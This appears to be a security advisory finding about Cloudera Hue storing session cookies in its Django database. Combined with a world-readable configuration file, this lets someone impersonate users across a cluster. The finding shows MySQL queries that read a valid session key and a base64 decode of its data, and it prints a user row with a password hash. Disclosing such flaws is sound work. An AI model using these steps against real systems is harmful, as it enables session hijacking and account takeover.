**User session cookies are stored** in the database. Combined with the vulnerability related to [configuration file which is world readable](../Configuration%20file%20world%20readable/), it is possible to **spoof a user across the entire cluster launching jobs and browsing the datalake**, without having to crack password hashes.
Cookies are stored in the `django_session` table: `session_key` is the **cookie** and `session_data` holds the **user id with some other information encoded in base64.**
The following example shows how to **find a valid session cookie for a specific user (id=1).**
mysql> select * from django_session limit 1 \G ;
*************************** 1. row ***************************
session_key: m67424cld61xe8960moyjj1esjqfiyvj
session_data: NGY2MzJhYjkxM2M5ZTU4ZDk0YjNjNjc4ODI1NmVkMzExMTI3YTc5NDp7Il9hdXRoX3VzZXJfYmFja2VuZCI6ImRlc2t0b3AuYXV0aC5iYWNrZW5kLkFsbG93Rmlyc3RVc2VyRGphbmdvQmFja2VuZCIsIl9hdXRoX3VzZXJfaWQiOjF9
expire_date: 2017-01-03 07:00:07
$ echo NGY2MzJhYjkxM2M5ZTU4ZDk0YjNjNjc4ODI1NmVkMzExMTI3YTc5NDp7Il9hdXRoX3VzZXJfYmFja2VuZCI6ImRlc2t0b3AuYXV0aC5iYWNrZW5kLkFsbG93Rmlyc3RVc2VyRGphbmdvQmFja2VuZCIsIl9hdXRoX3VzZXJfaWQiOjF9 | base64 -d
mysql> select * from auth_user where id = 1 \G ;
*************************** 1. row ***************************
id: 1
password: pbkdf2_sha256$12000$dtbAVcdT4Ph9$4QMdEvX5Z0b5NFcPb69L50/cRo2ARFg/WCtk3/dcPw0=
last_login: 2016-12-20 07:00:07
is_superuser: 1
username: cloudera
email: noreply@cloudera.com
is_staff: 1
is_active: 1
date_joined: 2015-11-18 13:08:31